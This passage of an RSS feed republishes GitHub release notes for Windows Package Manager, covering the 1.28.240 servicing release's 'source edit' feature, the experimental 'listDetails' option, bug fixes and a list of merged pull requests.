<li>Move to IReference rather than custom enum for optional bool by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892646118" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6022" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6022/hovercard" href="https://github.com/microsoft/winget-cli/pull/6022">#6022</a></li>
<li>Apply latest loc patch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893629466" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6023" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6023/hovercard" href="https://github.com/microsoft/winget-cli/pull/6023">#6023</a></li>
<li>Bump version to 1.29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888315257" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6019" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6019/hovercard" href="https://github.com/microsoft/winget-cli/pull/6019">#6019</a></li>
<li>Remove 'listDetails' from release notes for 1.29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893739947" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6026" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6026/hovercard" href="https://github.com/microsoft/winget-cli/pull/6026">#6026</a></li>
<li>Update doc as WinGet is not in preview by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gijsreyn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gijsreyn">@Gijsreyn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572990820" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5850" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5850/hovercard" href="https://github.com/microsoft/winget-cli/pull/5850">#5850</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.28.110-preview...v1.29.50-preview"><tt>v1.28.110-preview...v1.29.50-preview</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.28.240]]></title>
<description><![CDATA[This is a servicing release of Windows Package Manager v1.28. If you find any bugs or problems, please help us out by filing an issue.
New in v1.28

Bumped the winget version to 1.28 to match the package version.
Additional options for limiting the size of log files.

New Feature: 'source edit'
N...]]></description>
<link>https://tsecurity.de/de/3601255/downloads/windows-package-manager-128240/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601255/downloads/windows-package-manager-128240/</guid>
<pubDate>Tue, 16 Jun 2026 11:31:50 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a servicing release of Windows Package Manager v1.28. If you find any bugs or problems, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.28</h2>
<ul>
<li>Bumped the winget version to 1.28 to match the package version.</li>
<li>Additional <a href="https://github.com/microsoft/winget-cli/blob/master/doc/Settings.md#file">options for limiting the size of log files</a>.</li>
</ul>
<h1>New Feature: 'source edit'</h1>
<p>New feature that adds an 'edit' subcommand to the 'source' command. This can be used to set an explicit source to be implicit and vice-versa. For example, with this feature you can make the 'winget-font' source an implicit source instead of explicit source.</p>
<p>To use the feature, try <code>winget source edit winget-font</code> to set the Explicit state to the default.</p>
<h1>New Experimental Feature: 'listDetails'</h1>
<p>The new experimental feature <code>listDetails</code> enables a new option for the <code>list</code> command, <code>--details</code>.  When supplied, the output is no longer a table view of the results but is instead a series of <code>show</code> like outputs drawing data from the installed item.</p>
<p>An example output for a single installed package is:</p>
<div class="highlight highlight-source-powershell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="&gt; wingetdev list Microsoft.VisualStudio.2022.Enterprise --details
Visual Studio Enterprise 2022 [Microsoft.VisualStudio.2022.Enterprise]
Version: 17.14.21 (November 2025)
Publisher: Microsoft Corporation
Local Identifier: ARP\Machine\X86\875fed29
Product Code: 875fed29
Installer Category: exe
Installed Scope: Machine
Installed Location: C:\Program Files\Microsoft Visual Studio\2022\Enterprise
Available Upgrades:
  winget [17.14.23]"><pre><span class="pl-k">&gt;</span> wingetdev list Microsoft.VisualStudio.<span class="pl-c1">2022.</span>Enterprise <span class="pl-k">--</span>details
Visual Studio Enterprise <span class="pl-c1">2022</span> [<span class="pl-k">Microsoft.VisualStudio.2022.Enterprise</span>]
Version: <span class="pl-c1">17.14</span>.<span class="pl-c1">21</span> (November <span class="pl-c1">2025</span>)
Publisher: Microsoft Corporation
Local Identifier: ARP\Machine\X86\875fed29
Product Code: 875fed29
Installer Category: exe
Installed Scope: Machine
Installed Location: C:\Program Files\Microsoft Visual Studio\<span class="pl-c1">2022</span>\Enterprise
Available Upgrades:
  winget [<span class="pl-c1">17.14</span>.<span class="pl-c1">23</span>]</pre></div>
<p>If sixels are enabled and supported by the terminal, an icon for the installed package will be shown.</p>
<p>To enable this feature, add the 'listDetails' experimental feature to your settings.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='"experimentalFeatures": {
    "listDetails": true
},'><pre class="notranslate"><code>"experimentalFeatures": {
    "listDetails": true
},
</code></pre></div>
<h2>Bug Fixes</h2>
<ul>
<li>Portable Packages now use the correct directory separators regardless of which convention is used in the manifest</li>
<li><code>--suppress-initial-details</code> now works with <code>winget configure test</code></li>
<li><code>--suppress-initial-details</code> no longer requires <code>--accept-configuration-agreements</code></li>
<li>Corrected property of <code>Font</code> experimental feature to accurately reflect <code>fonts</code> as the required setting value</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Update the other TDBuild task by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151652738" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5534" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5534/hovercard" href="https://github.com/microsoft/winget-cli/pull/5534">#5534</a></li>
<li>Use windows-latest agents in localization pipeline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3154579970" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5538" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5538/hovercard" href="https://github.com/microsoft/winget-cli/pull/5538">#5538</a></li>
<li>Bump version to v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151371086" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5532" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5532/hovercard" href="https://github.com/microsoft/winget-cli/pull/5532">#5532</a></li>
<li>Allow set foreground from PS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3154984365" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5541" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5541/hovercard" href="https://github.com/microsoft/winget-cli/pull/5541">#5541</a></li>
<li>Move to proper signal for dev/not-dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3169763143" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5552" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5552/hovercard" href="https://github.com/microsoft/winget-cli/pull/5552">#5552</a></li>
<li>Use SDK 26100 in CommonCore project by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3200120927" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5570" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5570/hovercard" href="https://github.com/microsoft/winget-cli/pull/5570">#5570</a></li>
<li>Repair Repair-WinGetPackageManager by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3197628230" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5568" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5568/hovercard" href="https://github.com/microsoft/winget-cli/pull/5568">#5568</a></li>
<li>Use cpprestsdk v2.10.18 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3197577111" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5567" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5567/hovercard" href="https://github.com/microsoft/winget-cli/pull/5567">#5567</a></li>
<li>Undefined-behaviour fix: safely call std::isspace in CompletionData by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohiuddin-khan-shiam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohiuddin-khan-shiam">@mohiuddin-khan-shiam</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186146724" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5564" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5564/hovercard" href="https://github.com/microsoft/winget-cli/pull/5564">#5564</a></li>
<li>Add missing compilation flags for vcpkg ports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3224397023" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5587" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5587/hovercard" href="https://github.com/microsoft/winget-cli/pull/5587">#5587</a></li>
<li>Add more missing flags for vcpkg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3237619990" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5592" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5592/hovercard" href="https://github.com/microsoft/winget-cli/pull/5592">#5592</a></li>
<li>Swallow provisioned package errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3240833652" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5595" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5595/hovercard" href="https://github.com/microsoft/winget-cli/pull/5595">#5595</a></li>
<li>Update detours vcpkg to use prior version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3244916547" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5601" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5601/hovercard" href="https://github.com/microsoft/winget-cli/pull/5601">#5601</a></li>
<li>Remove TestRelease by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3253760151" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5613" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5613/hovercard" href="https://github.com/microsoft/winget-cli/pull/5613">#5613</a></li>
<li>Handle Byte Order Mark during validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3220923892" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5585" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5585/hovercard" href="https://github.com/microsoft/winget-cli/pull/5585">#5585</a></li>
<li>Initial MCP Server implementation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3250446710" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5610" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5610/hovercard" href="https://github.com/microsoft/winget-cli/pull/5610">#5610</a></li>
<li>Update release notes for BOM Handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3264891691" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5622" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5622/hovercard" href="https://github.com/microsoft/winget-cli/pull/5622">#5622</a></li>
<li>Don't build MCP for fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3267257548" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5625" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5625/hovercard" href="https://github.com/microsoft/winget-cli/pull/5625">#5625</a></li>
<li>Resolve nuget package graph for .NET projects together by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3274445183" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5627" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5627/hovercard" href="https://github.com/microsoft/winget-cli/pull/5627">#5627</a></li>
<li>Update to latest MCP nuget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284768501" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5633" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5633/hovercard" href="https://github.com/microsoft/winget-cli/pull/5633">#5633</a></li>
<li>Update release notes to mention WinUI dependency change by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3315786475" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5656" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5656/hovercard" href="https://github.com/microsoft/winget-cli/pull/5656">#5656</a></li>
<li>Improve COM server quiescing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3311253541" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5652" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5652/hovercard" href="https://github.com/microsoft/winget-cli/pull/5652">#5652</a></li>
<li>Improve issue forms &amp; add corresponding label triggers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mdanish-kh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mdanish-kh">@mdanish-kh</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3319838802" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5661" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5661/hovercard" href="https://github.com/microsoft/winget-cli/pull/5661">#5661</a></li>
<li>Fix conflict with issue forms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3320119960" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5663" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5663/hovercard" href="https://github.com/microsoft/winget-cli/pull/5663">#5663</a></li>
<li>Improve COM static store usage by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3346435528" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5680" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5680/hovercard" href="https://github.com/microsoft/winget-cli/pull/5680">#5680</a></li>
<li>Update schema to 1.12 with Font InstallerType by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3352674785" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5687" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5687/hovercard" href="https://github.com/microsoft/winget-cli/pull/5687">#5687</a></li>
<li>Download MS Store package for target OS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3353562454" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5689" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5689/hovercard" href="https://github.com/microsoft/winget-cli/pull/5689">#5689</a></li>
<li>Fixes for older OSes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3357315204" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5691" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5691/hovercard" href="https://github.com/microsoft/winget-cli/pull/5691">#5691</a></li>
<li>Add RestSource and tests for Manifest v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3360657592" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5695" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5695/hovercard" href="https://github.com/microsoft/winget-cli/pull/5695">#5695</a></li>
<li>Improve slow searches involving installed items by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3364993234" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5701" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5701/hovercard" href="https://github.com/microsoft/winget-cli/pull/5701">#5701</a></li>
<li>Shorter default installer log filename by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3368313385" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5705" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5705/hovercard" href="https://github.com/microsoft/winget-cli/pull/5705">#5705</a></li>
<li>Add the ARP correlation entry to the context for portable installs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3377690777" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5707" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5707/hovercard" href="https://github.com/microsoft/winget-cli/pull/5707">#5707</a></li>
<li>Fix two unrelated version issues by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3412285391" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5719" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5719/hovercard" href="https://github.com/microsoft/winget-cli/pull/5719">#5719</a></li>
<li>Heal tracking database if it can't open by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419506355" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5724" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5724/hovercard" href="https://github.com/microsoft/winget-cli/pull/5724">#5724</a></li>
<li>MS Store cert pinning updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3436228691" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5732" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5732/hovercard" href="https://github.com/microsoft/winget-cli/pull/5732">#5732</a></li>
<li>Update MCP GP name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3446264966" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5736" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5736/hovercard" href="https://github.com/microsoft/winget-cli/pull/5736">#5736</a></li>
<li>Add workflow for automatic issue deduplication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cinnamon-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cinnamon-msft">@cinnamon-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450208289" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5738" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5738/hovercard" href="https://github.com/microsoft/winget-cli/pull/5738">#5738</a></li>
<li>moving workflow to parent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450382277" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5740" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5740/hovercard" href="https://github.com/microsoft/winget-cli/pull/5740">#5740</a></li>
<li>Cache information responses from REST sources by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3424158468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5726" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5726/hovercard" href="https://github.com/microsoft/winget-cli/pull/5726">#5726</a></li>
<li>Shared build props by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3458857805" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5749" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5749/hovercard" href="https://github.com/microsoft/winget-cli/pull/5749">#5749</a></li>
<li>Improve shared props layout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3459246168" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5751" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5751/hovercard" href="https://github.com/microsoft/winget-cli/pull/5751">#5751</a></li>
